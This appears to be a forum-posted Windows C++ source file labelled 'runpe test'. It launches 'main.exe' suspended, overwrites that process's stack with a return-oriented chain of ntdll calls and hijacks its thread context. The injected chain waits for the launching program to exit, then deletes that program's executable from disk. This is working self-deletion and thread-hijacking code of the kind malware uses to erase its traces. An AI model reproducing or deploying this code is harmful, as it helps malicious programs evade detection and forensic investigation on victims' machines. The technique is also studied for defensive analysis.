Code:
// runpe test.cpp : Defines the entry point for the console application.


#include <windows.h>
#include <cstdio>
#include <ntdll.h>
#include <stddef.h>
#pragma comment(lib, "ntdll.lib")


/* Evaluates to true when h is either of the two "no handle" values used by
	the Windows API: NULL or INVALID_HANDLE_VALUE. Note that h is expanded
	twice, so do not pass an expression with side effects. */
#define INVALID_HANDLE(h) (NULL == (h) || INVALID_HANDLE_VALUE == (h))


/*
	\brief Opens the executable file of the current process with DELETE
		access through the native API.
		The file is opened with full sharing (read/write/delete) so the open
		does not conflict with other handles to the same file.
	\return A handle to the file, or INVALID_HANDLE_VALUE if the module path
		could not be determined, could not be converted to an NT path, or
		NtOpenFile failed (in which case the status is printed). The caller
		owns the returned handle.
*/
HANDLE get_current_file_handle()
{
	WCHAR fileNameString[MAX_PATH] = {0};
	UNICODE_STRING fileName = {0};
	OBJECT_ATTRIBUTES obj = {0};
	HANDLE fileHandle = INVALID_HANDLE_VALUE;
	IO_STATUS_BLOCK io = {0};
	NTSTATUS status;
	DWORD length;


	/* Use the explicit wide variant: the buffer is WCHAR regardless of
		whether UNICODE is defined. A return of 0 means failure, a return
		equal to the buffer size means the path was truncated. */
	length = GetModuleFileNameW(NULL, fileNameString, _countof(fileNameString));
	if(0 == length || length >= _countof(fileNameString))
		return INVALID_HANDLE_VALUE;

	if(!RtlDosPathNameToNtPathName_U(fileNameString, &fileName, NULL, NULL))
		return INVALID_HANDLE_VALUE;
	InitializeObjectAttributes(&obj, &fileName, OBJ_CASE_INSENSITIVE, NULL, NULL);


	/* The last argument is OpenOptions. No options are requested; a
		create disposition such as FILE_SUPERSEDE does not belong here. */
	status = NtOpenFile(&fileHandle, DELETE, &obj, &io, 
		FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
		0);

	/* The NT path buffer was allocated by RtlDosPathNameToNtPathName_U and
		is no longer needed once the open has been attempted. */
	RtlFreeUnicodeString(&fileName);

	/* Treat everything that is not a success status as failure so that a
		handle which was never written is not handed to the caller. */
	if(!NT_SUCCESS(status))
	{
		printf("status = %X\n", (unsigned int)status);
		return INVALID_HANDLE_VALUE;
	}	
	
	return fileHandle;
}


/*
	\brief Builds the ROP chain and writes it to address inside process.
		The chain MUST start execution at NtWaitForSingleObject with the
		stack pointer equal to address. The layout relies on every called
		function removing its own arguments from the stack on return, so
		that each return lands on the next frame. The chain will:
		- Wait until this process has terminated.
		- Then close the handle to this process.
		- Mark the file of this process for deletion.
		- Close the handle to this file - which will trigger the
		deletion.
		- Exit the thread.
	\param process Process to write to. Handles to the current process and
		to its executable file are duplicated into it.
	\param address Address inside process to write to (32-bit).
	\return true if the complete chain was written, false otherwise. On
		failure, handles that were already duplicated into process are not
		closed again; the caller is expected to discard that process.
	\fixme Maybe don't delete but overwrite with trash?
*/
bool write_ROP_chain(HANDLE process, DWORD address)
{
	HANDLE duplicatedProcessHandle = INVALID_HANDLE_VALUE,
		fileHandle = INVALID_HANDLE_VALUE;
	SIZE_T written = 0;
	NTSTATUS status;
	DWORD ropChain[] = {
		// EIP = NtWaitForSingleObject
		(DWORD)&NtClose,						// [0]  Return address 
		0,										// [1]  Own process handle
		FALSE,									// [2]  Alertable
		0,										// [3]  Timeout (none)
		// EIP = NtClose
		(DWORD)&NtSetInformationFile,			// [4]  Return address
		0,										// [5]  Own process handle
		// EIP = NtSetInformationFile
		(DWORD)&NtClose,						// [6]  Return addr
		0,										// [7]  File handle
		0,										// [8]  Pointer to IoStatusBlock
		0,										// [9]  Pointer to FileInformation
		sizeof(FILE_DISPOSITION_INFORMATION),	// [10] Length
		FileDispositionInformation,				// [11] FILE_INFORMATION_CLASS
		// EIP = NtClose
		(DWORD)&RtlExitUserThread,				// [12] Ret. addr
		0,										// [13] File handle
		// EIP = RtlExitUserThread
		0,										// [14] Return address slot (never used)
		(DWORD)STATUS_CANNOT_DELETE,			// [15] Exit status


		// FILE_DISPOSITION_INFORMATION structure
		TRUE,									// [16] DeleteFile
	};
	/* Byte offset of the last slot, which backs the
		FILE_DISPOSITION_INFORMATION structure. */
	const DWORD dispositionOffset = (DWORD)(sizeof(ropChain) - sizeof(ropChain[0]));


	if(INVALID_HANDLE(process) || !address)
		return false;
	
	// Duplicate current process handle so the other process can wait on it
	status = NtDuplicateObject(GetCurrentProcess(), GetCurrentProcess(), process, 
		&duplicatedProcessHandle, 0, 0, DUPLICATE_SAME_ACCESS);
	if(NT_ERROR(status))
	{
		printf("Can't duplicate process handle: %X\n", (unsigned int)status);
		return false;
	}
	ropChain[1] = (DWORD)duplicatedProcessHandle; // NtWaitForSingleObject
	ropChain[5] = (DWORD)duplicatedProcessHandle; // NtClose


	fileHandle = get_current_file_handle();
	if(INVALID_HANDLE_VALUE == fileHandle)
	{
		printf("Can't get file handle: %X\n", (unsigned int)GetLastError());
		return false;
	}


	/* This duplicates and closes the local handle of this file. After the
		call fileHandle holds the handle value valid inside process. */
	status = NtDuplicateObject(GetCurrentProcess(), fileHandle, process, &fileHandle, 
		0, 0, DUPLICATE_CLOSE_SOURCE | DUPLICATE_SAME_ACCESS);
	if(NT_ERROR(status))
	{
		printf("Can't duplicate file handle: %X\n", (unsigned int)status);
		return false;
	}
	ropChain[7] = (DWORD)fileHandle; // NtSetInformationFile
	ropChain[13] = (DWORD)fileHandle; // NtClose


	/* Setup IO_STATUS_BLOCK for NtSetInformationFile. As at this point a 
		large enough portion of the ROP chain has been executed and IO_STATUS_BLOCK
		needs no special values so just use the top of chain */
	ropChain[8] = address;


	/* FileDispositionInformation needs a TRUE so we just add one at the
		end of the ROP chain and make a pointer to it. The pointer must
		address the START of that last slot: subtracting
		sizeof(FILE_DISPOSITION_INFORMATION) from the end instead would
		address the slot's high byte (which is 0) whenever the structure
		is a single BOOLEAN. */
	ropChain[9] = address + dispositionOffset;


	if(!WriteProcessMemory(process, (LPVOID)address, ropChain, sizeof(ropChain), &written) ||
		sizeof(ropChain) != written)
	{
		printf("Couldn't write: %X\n", (unsigned int)GetLastError());
		return false;
	}


	return true;
}




void entry()
{
	CONTEXT ctx = {0};
	_PROCESS_INFORMATION pi = {0};
	STARTUPINFOA si = {0};
	const char* FILE_TO_EXECUTE = "main.exe";
	bool success = false;


	si.cb = sizeof(STARTUPINFOA);
	if(!CreateProcessA(FILE_TO_EXECUTE, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi))
		goto EXIT;


	ctx.ContextFlags = CONTEXT_ALL;
	if(!GetThreadContext(pi.hThread, &ctx))
	{
		printf("Can't get thread context\n");
		goto FINISH_OTHER_PROCESS;
	}


	printf("EAX: %X\tESP: %X\tEIP: %X\n", ctx.Eax, ctx.Esp, ctx.Eip);
	
	/* ROP chain needs a certain size so just round ESP down to
		page boundary - which is enough */
	ctx.Esp &= ~0xFFF;
	if(!write_ROP_chain(pi.hProcess, ctx.Esp))
	{
		printf("Can't overwrite stack\n");
		goto FINISH_OTHER_PROCESS;
	}


	ctx.Eip = (DWORD)&NtWaitForSingleObject;
	if(!SetThreadContext(pi.hThread, &ctx))
	{
		printf("Can't set thread context\n");
		goto FINISH_OTHER_PROCESS;
	}


	success = true;


FINISH_OTHER_PROCESS:
	if(success)
	{
		ResumeThread(pi.hThread);


		/* For debugging this can be uncommented so you have time to
			attach to the other process. 
		WaitForSingleObject(pi.hProcess, INFINITE); */
	}
	else
	{
		TerminateProcess(pi.hProcess, 0);
	}


CLEANUP:
	CloseHandle(pi.hThread);
	CloseHandle(pi.hProcess);
EXIT:
	ExitProcess(0);
}